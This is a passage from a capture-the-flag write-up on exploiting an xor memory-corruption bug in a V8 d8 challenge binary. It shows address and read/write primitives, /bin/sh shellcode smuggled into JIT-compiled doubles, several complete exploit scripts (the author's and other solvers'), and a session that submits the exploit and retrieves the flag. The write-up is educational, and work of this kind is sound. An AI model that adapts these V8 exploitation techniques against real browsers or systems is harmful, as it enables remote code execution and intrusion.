instructionsAddr = 0x2d7a00000000n + addrof(instructions) - 0x10n

write(instructionStart, instructionsAddr)

func()

Received signal 11 SEGV_ACCERR 2d7a00050061 Segmentation fault (core dumped)

Huh, that didn't work, why is that?

The SEGV_ACCERR signal gives us a hint - it means that there was some sort of a permissions error accessing the memory map. It turns out not all memory is made equal and different parts of the memory have different permissions. In Linux we can see this by looking at the map of a process.

$ ./d8 & <-- run d8 in the background [1] 1962 <-- that's the d8 process id $ V8 version 12.7.0 (candidate) d8> [1]+ Stopped ./d8 $ cat /proc/1962/maps <-- look at the process map a6b00000000-1a6b00010000 r--p 00000000 00:00 0 1a6b00010000-1a6b00020000 ---p 00000000 00:00 0 1a6b00020000-1a6b00040000 r--p 00000000 00:00 0 1a6b00040000-1a6b00143000 rw-p 00000000 00:00 0 1a6b00143000-1a6b00180000 ---p 00000000 00:00 0 1a6b00180000-1a6b00181000 rw-p 00000000 00:00 0 1a6b00181000-1a6b001c0000 ---p 00000000 00:00 0 1a6b001c0000-1a6b00200000 rw-p 00000000 00:00 0 1a6b00200000-1a6b00300000 ---p 00000000 00:00 0 1a6b00300000-1a6b00316000 r--p 00000000 00:00 0 1a6b00316000-1a6b00340000 ---p 00000000 00:00 0 1a6b00340000-1a6c00000000 ---p 00000000 00:00 0 55987ab85000-55987bcc3000 r--p 00000000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987bcc4000-55987d35e000 r-xp 0113e000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987d35e000-55987d3df000 r--p 027d7000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987d3e0000-55987d3ec000 rw-p 02858000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987d3ec000-55987d3ed000 r--p 02864000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987d3ed000-55987d3fb000 rw-p 02865000 08:01 1356475 /home/lyra/Desktop/array.xor/dist/d8 55987d3fb000-55987d42e000 rw-p 00000000 00:00 0 55987f17d000-55987f214000 rw-p 00000000 00:00 0 [heap] 5598dcf80000-5598fcf80000 rwxp 00000000 00:00 0 7f68b8000000-7f68b8010000 r--p 00000000 00:00 0 7f68b8010000-7f68d8000000 ---p 00000000 00:00 0 7f68d8000000-7f68d8010000 r--p 00000000 00:00 0 7f68d8010000-7f68f8000000 ---p 00000000 00:00 0 7f68f8000000-7f68f8010000 r--p 00000000 00:00 0 7f68f8010000-7f6918000000 ---p 00000000 00:00 0 7f6918000000-7f6918021000 rw-p 00000000 00:00 0 7f6918021000-7f691c000000 ---p 00000000 00:00 0 7f691c000000-7f691c021000 rw-p 00000000 00:00 0 7f691c021000-7f6920000000 ---p 00000000 00:00 0 7f6920000000-7f6920021000 rw-p 00000000 00:00 0 7f6920021000-7f6924000000 ---p 00000000 00:00 0 7f6927dce000-7f6927e1c000 rw-p 00000000 00:00 0 7f6927e1c000-7f6927e1d000 ---p 00000000 00:00 0 7f6927e1d000-7f692861d000 rw-p 00000000 00:00 0 7f692861d000-7f692861e000 ---p 00000000 00:00 0 7f692861e000-7f6928e1e000 rw-p 00000000 00:00 0 7f6928e1e000-7f6928e1f000 ---p 00000000 00:00 0 7f6928e1f000-7f6929623000 rw-p 00000000 00:00 0 7f6929623000-7f6929647000 r--p 00000000 08:01 5648200 /usr/lib/libc.so.6 7f6929647000-7f69297ab000 r-xp 00024000 08:01 5648200 /usr/lib/libc.so.6 7f69297ab000-7f69297f9000 r--p 00188000 08:01 5648200 /usr/lib/libc.so.6 7f69297f9000-7f69297fd000 r--p 001d6000 08:01 5648200 /usr/lib/libc.so.6 7f69297fd000-7f69297ff000 rw-p 001da000 08:01 5648200 /usr/lib/libc.so.6 7f69297ff000-7f6929807000 rw-p 00000000 00:00 0 7f6929807000-7f692980b000 r--p 00000000 08:01 5641004 /usr/lib/libgcc_s.so.1 7f692980b000-7f6929826000 r-xp 00004000 08:01 5641004 /usr/lib/libgcc_s.so.1 7f6929826000-7f692982a000 r--p 0001f000 08:01 5641004 /usr/lib/libgcc_s.so.1 7f692982a000-7f692982b000 r--p 00022000 08:01 5641004 /usr/lib/libgcc_s.so.1 7f692982b000-7f692982c000 rw-p 00023000 08:01 5641004 /usr/lib/libgcc_s.so.1 7f692982c000-7f692983a000 r--p 00000000 08:01 5648210 /usr/lib/libm.so.6 7f692983a000-7f69298b9000 r-xp 0000e000 08:01 5648210 /usr/lib/libm.so.6 7f69298b9000-7f6929915000 r--p 0008d000 08:01 5648210 /usr/lib/libm.so.6 7f6929915000-7f6929916000 r--p 000e8000 08:01 5648210 /usr/lib/libm.so.6 7f6929916000-7f6929917000 rw-p 000e9000 08:01 5648210 /usr/lib/libm.so.6 7f6929917000-7f6929918000 r--p 00000000 08:01 5648228 /usr/lib/libpthread.so.0 7f6929918000-7f6929919000 r-xp 00001000 08:01 5648228 /usr/lib/libpthread.so.0 7f6929919000-7f692991a000 r--p 00002000 08:01 5648228 /usr/lib/libpthread.so.0 7f692991a000-7f692991b000 r--p 00002000 08:01 5648228 /usr/lib/libpthread.so.0 7f692991b000-7f692991c000 rw-p 00003000 08:01 5648228 /usr/lib/libpthread.so.0 7f692991c000-7f692991d000 r--p 00000000 08:01 5648205 /usr/lib/libdl.so.2 7f692991d000-7f692991e000 r-xp 00001000 08:01 5648205 /usr/lib/libdl.so.2 7f692991e000-7f692991f000 r--p 00002000 08:01 5648205 /usr/lib/libdl.so.2 7f692991f000-7f6929920000 r--p 00002000 08:01 5648205 /usr/lib/libdl.so.2 7f6929920000-7f6929921000 rw-p 00003000 08:01 5648205 /usr/lib/libdl.so.2 7f6929921000-7f6929923000 rw-p 00000000 00:00 0 7f6929948000-7f6929949000 r--p 00000000 08:01 5648191 /usr/lib/ld-linux-x86-64.so.2 7f6929949000-7f6929970000 r-xp 00001000 08:01 5648191 /usr/lib/ld-linux-x86-64.so.2 7f6929970000-7f692997a000 r--p 00028000 08:01 5648191 /usr/lib/ld-linux-x86-64.so.2 7f692997a000-7f692997c000 r--p 00032000 08:01 5648191 /usr/lib/ld-linux-x86-64.so.2 7f692997c000-7f692997e000 rw-p 00034000 08:01 5648191 /usr/lib/ld-linux-x86-64.so.2 7ffde1b30000-7ffde1b51000 rw-p 00000000 00:00 0 [stack] 7ffde1baf000-7ffde1bb3000 r--p 00000000 00:00 0 [vvar] 7ffde1bb3000-7ffde1bb5000 r-xp 00000000 00:00 0 [vdso] ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall] $

These are all the memory addresses d8 uses, and each one of them has permissions associated with them - read, write, and execute respectively. The array we made is in one of the read-write maps, so trying to execute code from there is going to result in a crash. We'll need to write into a map with execute permissions.

But how are we going to write data into that one memory map that does have the rwx permissions? We cannot use our write primitive because it can only write into the lower 32 bits our compressed pointer can access.

In figuring this out, I came across this awesome writeup by Anvbis demonstrating how we can use Turbofan to do exactly that through a very clever trick. I'll be borrowing heavily from that post, but it goes a lot more in-depth so please check it out if this sounds interesting.

What Anvbis did was create a function with doubles in it, and those doubles got Turbofan-optimized into bytes in the rwx area. They could then offset the instruction start pointer to start execution from those doubles instead of the original code.

Let's see if we can trigger an INT3 breakpoint this way.

i2f(0xCCCCCCCCCCCCCCCCn)

-9.255963134931783e+61

function int3() { return [ -9.255963134931783e+61, // i changed -9.255963134931784e+61, // every line -9.255963134931785e+61, // a little -9.255963134931786e+61, // so that -9.255963134931787e+61, // the doubles -9.255963134931788e+61, // wouldn't get -9.255963134931789e+61, // optimized -9.255963134931780e+61 // into one ] }

int3()

(8) [-9.255963134931783e+61, -9.255963134931784e+61, -9.255963134931785e+61, -9.255963134931786e+61, -9.255963134931786e+61, -9.255963134931788e+61, -9.255963134931789e+61, -9.25596313493178e+61]

0: 0xcccccccccccccccc
1: 0xcccccccccccccccd
2: 0xccccccccccccccce
3: 0xcccccccccccccccf
4: 0xcccccccccccccccf // dupe, whoops
5: 0xccccccccccccccd0
6: 0xccccccccccccccd1
7: 0xccccccccccccccc9

%PrepareFunctionForOptimization(int3)

int3()

%OptimizeFunctionOnNextCall(int3)

int3()

funcAddr = addrof(int3)

codeAddr = read(funcAddr + 0x8n) >> 32n

instructionStart = codeAddr + 0x14n

hex64(read(instructionStart))

'0x00005555b7941b00'

Thread 1 "d8" received signal SIGTSTP, Stopped (user). (gdb) x/32xg 0x00005555b7941b00 0x5555b7941b00: 0x43f6de0349f4598b
0x5555b7941b08: 0xa0035af0850f201e 0x5555b7941b10: 0x48505756e5894855
0x5555b7941b18: 0x0fa0653b4908ec83 0x5555b7941b20: 0x4d8b490000010186
0x5555b7941b28: 0x7d394958798d4848 0x5555b7941b30: 0x480000011f860f50
0x5555b7941b38: 0x48487d894948798d 0x5555b7941b40: 0x08a9ff41c701c183
0x5555b7941b48: 0x0000100341c70000 0x5555b7941b50: 0xccccccccccba4900
0x5555b7941b58: 0xc26ef9c1c4cccccc 0x5555b7941b60: 0xcdba49074111fbc5
0x5555b7941b68: 0xc4cccccccccccccc 0x5555b7941b70: 0x4111fbc5c26ef9c1
0x5555b7941b78: 0xccccccccceba490f 0x5555b7941b80: 0xc26ef9c1c4cccccc
0x5555b7941b88: 0xcfba49174111fbc5 0x5555b7941b90: 0xc4cccccccccccccc
0x5555b7941b98: 0x4111fbc5c26ef9c1 0x5555b7941ba0: 0xba49274111fbc51f
0x5555b7941ba8: 0xccccccccccccccd0 0x5555b7941bb0: 0x11fbc5c26ef9c1c4
0x5555b7941bb8: 0xccccccd1ba492f41 0x5555b7941bc0: 0x6ef9c1c4cccccccc
0x5555b7941bc8: 0xba49374111fbc5c2 0x5555b7941bd0: 0xccccccccccccccc9
0x5555b7941bd8: 0x11fbc5c26ef9c1c4 0x5555b7941be0: 0x894d10478d4c3f41
0x5555b7941be8: 0xb84101c783484845 0x5555b7941bf0: 0xff478944001cb7c5
0x5555b7941bf8: 0x89000007250347c7 (gdb) c Continuing.

write(instructionStart, read(instructionStart) + 0x53n)

int3()

Thread 1 "d8" received signal SIGTRAP, Trace/breakpoint trap. 0x00005555b7941b53 in ?? () (gdb)

Perfect! We found the place in the rwx memory our 0xCC instruction got moved to, and then successfully redirected the execution to that point. The only problem is that our doubles in the memory are not directly one after another - there's some other instructions in-between and we must deal with that somehow.

The solution to that is creating some very special shellcode that carefully jumps from one double to the next in a way where our code is the only code getting executed. Anvbis' writeup does a way better job of explaining this than I ever could, so go check it out!

function shellcode() { return [ // Anvbis' /bin/sh shellcode 1.9711828979523134e-246, 1.9562205631094693e-246, 1.9557819155246427e-246, 1.9711824228871598e-246, 1.971182639857203e-246, 1.9711829003383248e-246, 1.9895153920223886e-246, 1.971182898881177e-246 ] }

shellcode()

%PrepareFunctionForOptimization(shellcode)

shellcode()

%OptimizeFunctionOnNextCall(shellcode)

shellcode()

funcAddr = addrof(shellcode)

codeAddr = read(funcAddr + 0x8n) >> 32n

instructionStart = codeAddr + 0x14n

write(instructionStart, read(instructionStart) + 0x53n)

shellcode()

lyra@horse:~$ whoami lyra lyra@horse:~$ fortune You have a deep interest in all that is artistic. lyra@horse:~$

We got shell!!! We're almost there, except...

Part 5: Please don't collect the garbage

We're still reliant on the %PrepareFunctionForOptimization() and %OptimizeFunctionOnNextCall() debug functions. We can't use them in the actual CTF, so let's try to replace them.

We want to somehow tell V8 to optimize our function with Turbofan, and the easiest way to accomplish that is to just run our function a lot of times, let's give it a shot!

for (let i = 0; i < 10000; i++) shellcode();

%DebugPrint(shellcode)

DebugPrint: 0x128c001d3e95: [Function] in OldSpace - code: 0x128c00032cc1 <Code BUILTIN InterpreterEntryTrampoline>

for (let i = 0; i < 100000; i++) shellcode();

%DebugPrint(shellcode)

DebugPrint: 0x128c001d3e95: [Function] in OldSpace - code: 0x128c0020051d <Code MAGLEV>

for (let i = 0; i < 1000000; i++) shellcode();

%DebugPrint(shellcode)

DebugPrint: 0x128c001d3e95: [Function] in OldSpace - code: 0x128c00200ad9 <Code TURBOFAN>

Yay, we got our Turbofan code without having to use the debug function stuff! Now let's try running the exploit again.

$ gdb --args ./d8 exploit.js GNU gdb (GDB) 14.2 (gdb) run [Thread 0x7ffff74986c0 (LWP 3563) exited] [Thread 0x7ffff6c976c0 (LWP 3564) exited] [Thread 0x7ffff7c996c0 (LWP 3562) exited] [Inferior 1 (process 3559) exited normally] (gdb)

huh... that didn't work?

Let's try again with some debug logging and the --trace-gc flag added.

$ gdb --args ./d8 --trace-gc --allow-natives-syntax exploit.js GNU gdb (GDB) 14.2 (gdb) run Optimizing shellcode() into TURBOFAN [3735:0x555557e0a000] 61 ms: Scavenge 1.1 (1.8) -> 0.1 (2.8) MB, pooled: 0 MB, 14.69 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 79 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 16.18 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 96 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 16.78 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 111 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 14.87 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 123 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 11.77 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 136 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 12.39 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 155 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 18.08 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 177 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 9.98 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 185 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 7.04 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; [3735:0x555557e0a000] 191 ms: Scavenge 1.1 (3.0) -> 0.1 (3.0) MB, pooled: 0 MB, 6.31 / 0.00 ms (average mu = 1.000, current mu = 1.000) allocation failure; DebugPrint: 0x298a001d4011: [Function] in OldSpace - code: 0x39bb002005e5 <Code TURBOFAN> funcAddr: 0x00043999 codeAddr: 0x00000725 instructionStart: 0x00000725 Writing shellcode Running shellcode [Thread 0x7ffff74986c0 (LWP 3739) exited] [Thread 0x7ffff6c976c0 (LWP 3740) exited] [Thread 0x7ffff7c996c0 (LWP 3738) exited] [Inferior 1 (process 3735) exited normally] (gdb)

Hmm, so our code gets optimized into Turbofan just fine, but the funcAddr is all wrong! It seems like the for loop causes the garbage collector to run, and what the garbage collector does is look at all the stuff in the memory and rearrange it to look nicer. More specifically, it identifies objects no longer in use, removes them, and also defragments the memory.

What this means for us is that it takes our cool oob array and all the other stuff we've set up and throws it all over the place. Our primitives no longer work! In my original exploit at the CTF I fought hard against the GC and eventually found a setup that worked regardless, but it was a bit unreliable. Wouldn't it be nice if we could somehow optimize our function without causing a GC?

I wasn't able to find a way to do this with Turbofan, but perhaps we could try out that Maglev thing we ignored earlier? Its output is a bit different, so we'll have to change our offsets, but since Maglev too compiles into machine code it should still work the same.

With that added, we have our final exploit code.

// set up helper stuff const buffer = new ArrayBuffer(8); const floatBuffer = new Float64Array(buffer); const int64Buffer = new BigUint64Array(buffer); // bigint to double function i2f(i) { int64Buffer[0] = i; return floatBuffer[0]; } // double to bigint function f2i(f) { floatBuffer[0] = f; return int64Buffer[0]; } // bigint to 32-bit hex string function hex32(i) { return "0x" + i.toString(16).padStart(8, 0); } // bigint to 64-bit hex string function hex64(i) { return "0x" + i.toString(16).padStart(16, 0); } // set up variables const arr = [1.1, 2.2, 3.3]; const tmpObj = {a: 1}; const objArr = [tmpObj]; // nabbed from Popax21 function obj2ptr(obj) { var arr = [13.37]; arr.xor({ valueOf: function() { arr[0] = {}; //Transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS arr[0] = obj; return 1; //Clear the lowest bit -> compressed SMI } }); return (arr[0] << 1) | 1; } // set up the fake array const arrAddr = BigInt(obj2ptr(arr)); const arrElementsAddr = arrAddr - 0x20n; const fakeAddr = arrElementsAddr + 0x10n; const fakeElementsAddr = arrElementsAddr + 0x8n; arr[0] = i2f(0x00000100000008a9n); arr[1] = i2f(0x00000725001cb7c5n); arr[2] = i2f(0x0000010000000000n + fakeElementsAddr); // do the exploit const tmp = [1.1]; const evil = { valueOf: () => { tmp[0] = arr; return Number(arrAddr ^ fakeAddr); } }; tmp.xor(evil); // this is the fake 128-element array const oob = tmp[0]; // set up addrof/fakeobj primitives function addrof(o) { objArr[0] = o; return f2i(oob[10]) >> 32n; } function fakeobj(a) { const temp = f2i(oob[10]) & 0xFFFFFFFFn; oob[10] = i2f(temp + (a << 32n)); return objArr[0]; } // set up read/write primitives function read(addr) { const readArr = [1.1, 2.2]; readArr[0] = i2f(0x00000725001cb7c5n); readArr[1] = i2f(0x0000000200000000n + addr - 0x8n); return f2i(fakeobj(addrof(readArr) - 0x10n)[0]); } function write(addr, data) { const writeArr = [1.1, 2.2]; writeArr[0] = i2f(0x00000725001cb7c5n); writeArr[1] = i2f(0x0000000200000000n + addr - 0x8n); const fakeArr = fakeobj(addrof(writeArr) - 0x10n); fakeArr[0] = i2f(data); } // set up the shellcode function function shellcode() { // nabbed from Anvbis return [ 1.9711828979523134e-246, 1.9562205631094693e-246, 1.9557819155246427e-246, 1.9711824228871598e-246, 1.971182639857203e-246, 1.9711829003383248e-246, 1.9895153920223886e-246, 1.971182898881177e-246 ] } // turn the shellcode into maglev for (let i = 0; i < 10000; i++) { shellcode(); } // redirect the function start to our shellcode funcAddr = addrof(shellcode) codeAddr = read(funcAddr + 0x8n) >> 32n instructionStart = codeAddr + 0x14n write(instructionStart, read(instructionStart) + 0x7fn); shellcode();

Let's get the flag!

$ nc arrayxor.challs.open.ecsc2024.it 38020 Do Hashcash for 24 bits with resource "k2v9WzPBJK2N" https://pow.cybersecnatlab.it/?data=k2v9WzPBJK2N&bits=24 or hashcash -mCb24 "k2v9WzPBJK2N" Result: 1:24:240525:k2v9WzPBJK2N::KmFvCdJ0h09D4MEm:00002QUYY Send me your js exploit b64-encoded followed by a newline Ly8gc2V0IHVwIGhlbHBlciBzdHVmZgpjb25zdCBidWZmZXIgPSBuZXcgQ... cat flag ; openECSC{t00_e5zy_w1th0ut_s4nb0x_gg_wp_5ec4376e}

gg.

Part 6: What could've been

Since this was my first time doing anything like this I made a few "mistakes" along the way. I think that's really the best way to learn, but I promised to show you a few different ways my exploit could've been significantly improved.

The first thing is something I've already implemented in the final exploit code above - the obj2ptr function I nabbed from Popax21's exploit code. Originally, I used %DebugPrint(arr) to see the address of the arr array on every run to change the code accordingly, but there's a pretty easy way to not have to do that at all!

// snippet from Popax21's exploit code function obj2ptr(obj) { var arr = [13.37]; arr.xor({ valueOf: function() { arr[0] = {}; //Transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS arr[0] = obj; return 1; //Clear the lowest bit -> compressed SMI } }); return (arr[0] << 1) | 1; } function ptr2obj(ptr) { var arr = [13.37]; arr.xor({ valueOf: function() { arr[0] = {}; //Transition from PACKED_DOUBLE_ELEMENTS to PACKED_ELEMENTS arr[0] = (ptr >> 1); return 1; //Set the lowest bit -> compressed pointer } }); return arr[0]; }

Since the difference between a pointer and an SMI is just the last bit, we can put any object or pointer into an array, xor its last bit, and get out the pointer or object accordingly. While I only used those functions in my example exploit code to get the initial address of arr, they are pretty much equal to the full addrof and fakeobj primitives! Beautiful.

Another approach to exploiting the xor I saw in a few solves was changing the length of the array to something small, then forcing a GC to defragment some other object into a region beyond past the array, and then changing the length back to a big amount to get an out-of-bounds read/write. This approach was probably quite brutal to work with, but earned rdjgr their first blood⁶.

// snippet from rdjgr's exploit code function pwn() { let num = {}; let size = 0x12; let num_rets = 0x10; let a = []; for (let i = 0; i < size; i++) { a.push(1.1); } var rets = [{a: 1.1}]; num.valueOf = function() { console.log("valueof called"); a.length = 1; gc(); rets.push({b: 1.1}); return 0x40; }; a.xor(num); rets.length = 900 return rets }

As for the code execution part, pretty much everyone went for a wasm rwx route instead of going through all the trouble I did to optimize a function into Maglev/Turbocode. There are a lot of write-ups for the wasm route, so I felt it'd be more fun to write about a different approach, and it was the approach I took at the original CTF either way.

In case you're wondering what my original code at the CTF looked like, it was this:

exploit_final.js

// lyra var bs = new ArrayBuffer(8); var fs = new Float64Array(bs); var is = new BigUint64Array(bs); function ftoi(x) { fs[0] = x; return is[0]; } function itof(x) { is[0] = x; return fs[0]; } const foo = (() => { const f = () => { return [ 1.9711828979523134e-246, 1.9562205631094693e-246, 1.9557819155246427e-246, 1.9711824228871598e-246, 1.971182639857203e-246, 1.9711829003383248e-246, 1.9895153920223886e-246, 1.971182898881177e-246, ]; } //%PrepareFunctionForOptimization(f); f(); //%OptimizeFunctionOnNextCall(f); for (var i = 0; i < 100000; i++) { f() } f() return f; })(); var a = []; for (var i = 0; i < 100000; i++) { a[i] = new String("");foo(); } new ArrayBuffer(0x80000000); var arr1 = [5.432309235825e-312, 1337.888, 3.881131231533e-311, 5.432329947926e-312]; var flt = [1.1]; var tmp = {a: 1}; var obj = [tmp]; var array = [-0]; var hasRun = false; //%DebugPrint(arr1); //%DebugPrint(flt); //%DebugPrint(obj); function getHandler() { if (hasRun) return; hasRun = true; array[0] = arr1; return 80; } x = [] x.__defineGetter__("0", getHandler); array.xor(x); //%DebugPrint(arr1); //%SystemBreak(); console.log("s1"); const oob = array[0]; console.log("s2"); console.log("s3"); function addrof(o) { console.log("oob = oob"); oob[6] = oob[18]; console.log("obj[0] = o"); obj[0] = o; console.log("ret"); return (ftoi(flt[0]) & 0xffffffffn) - 1n; } function read(p) { let a = ftoi(oob[6]) >> 32n; oob[6] = itof((a << 32n) + p - 8n + 1n); return ftoi(flt[0]); } function write(p, x) { let a = ftoi(oob[6]) >> 32n; oob[6] = itof((a << 32n) + p - 8n + 1n); flt[0] = itof(x); } console.log("s3.5"); let foo_addr = addrof(foo); console.log(foo_addr); console.log(oob[0]); foo_addr = addrof(foo); console.log("foo_addr:", foo_addr); let code = (read(foo_addr + 0x08n) - 1n) >> 32n; console.log("code:", code); console.log("0x00:", read(foo_addr + 0x00n)); console.log("0x10:", read(foo_addr + 0x10n)); let entry = read(code - 0x100n + 0x113n); console.log("entry:", entry); write(code - 0x100n + 0x113n, entry + 0x53n); entry = read(code - 0x100n + 0x113n); console.log("entry:", entry); console.log("launching"); console.log(tmp); foo();

Not as pretty as the one I eventually made for this writeup, but hey, I got the flag, and secured a place in the top 10 of the overall competition!

Footnotes

PACKED_DOUBLE_ELEMENTS means that the array consists of doubles only, and it also doesn't have any empty "holes". A double array with holes would be HOLEY_DOUBLE_ELEMENTS instead. ↩
HasOnlySimpleReceiverElements makes sure that there are no accessors on any of the elements, and that the array's prototype hasn't been modified. ↩
x/8xg stands for: e(x)amine (8) he(x)adecimal (g)iant words (64-bit values). I recommend checking out a reference to see other ways this command can be used. ↩
In memory, the length of the array appears as twice what it really is (eg 6 instead of 3) because SMIs need to end with a 0 bit or they'll become a tagged pointer. If the length of an array was over 2³¹-1 we'd see a pointer to a double instead. ↩
JavaScript floating-point numbers can only accurately represent integers up to 2⁵³–1. You can have larger numbers, but they won't be accurate. BigInts are a separate data type that doesn't have this issue - they can be infinitely big while still being accurate! Well, perhaps not infinitely big, but in V8 their size can be over a billion bits, which would be about 128MiB of just a single number. ↩
In CTF competitions, a "first blood" is the first (and often fastest) solve of a challenge. ↩

// Attachments

js//solution_pretty.jsDownload

js//solution_original.jsDownload

// [pwn] Baby Array.xor (6 solves)

// Writeup author: @rebane2001

// Challenge author: @Bonfee

Challenge description

Table of contents

Introduction

Part 1: Finding the memory corruption

Part 2: Breaking out of bounds

Part 3: Cooking up some primitives

Part 4: Code execution

Part 5: Please don't collect the garbage

Part 6: What could've been

Footnotes

// Attachments

#ECSC2024

// Organized by

// Supported by

// Diamond sponsor